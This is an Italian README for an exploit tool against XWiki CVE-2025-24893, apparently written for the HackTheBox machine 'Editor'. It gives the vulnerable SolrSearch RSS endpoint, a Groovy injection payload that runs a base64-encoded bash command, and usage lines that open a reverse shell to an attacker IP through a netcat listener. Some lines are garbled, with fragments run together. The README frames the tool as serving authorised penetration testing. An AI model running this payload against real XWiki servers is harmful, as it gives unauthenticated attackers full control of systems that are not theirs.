
Exploit RCE non autenticato per XWiki CVE-2025-24893 tramite iniezione di script Groovy
Exploit di Esecuzione Remota di Codice non autenticato per le versioni di XWiki vulnerabili a CVE-2025-24893.
Le versioni di XWiki precedenti alla 15.10.9 sono vulnerabili a RCE non autenticata tramite l'iniezione di script Groovy nel gestore dei feed RSS di SolrSearch. La vulnerabilità esiste perché XWiki non riesce a sanitizzare correttamente l'input dell'utente nel parametro text, consentendo agli attaccanti di uscire dal contesto RSS e iniettare codice Groovy arbitrario.
ID CVE: CVE-2025-24893
Punteggio CVSS: 9.8 (Critico)
Versioni interessate: XWiki < 15.10.9
requests)pip3 install requests
python3 exploit.py <target_url> <attacker_ip> <listener_port>
Esempio:
# Start listener on attacker machine
nc -lvnp 9001
# Run exploit
python3 exploit.py http://10.10.11.80:8080 10.10.14.5 9001
}}}}}}{{{{groovy}}}})/xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload>L'exploit ha come bersaglio il seguente endpoint:
/xwiki/bin/get/Main/SolrSearch?media=rss&text=
La vulnerabilità consente di uscire dal contesto del feed RSS:
}}}}}}{{{{async async=false}}}}{{{{groovy}}}}
"bash -c {echo,<base64_payload>}|{base64,-d}|{bash,-i}".execute()
{{{{/groovy}}}}{{{{/async}}}}
Questo strumento è destinato esclusivamente a scopi educativi e di test di penetrazione autorizzati. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo programma. Utilizza questo exploit solo contro sistemi di tua proprietà o per i quali hai esplicita autorizzazione a testare.
Licenza MIT - Consulta il file LICENSE per i dettagli
Creato per la macchina HTB "Editor"
Nota: Assicurati sempre di avere la dovuta autorizzazione prima di testare qualsiasi sistema.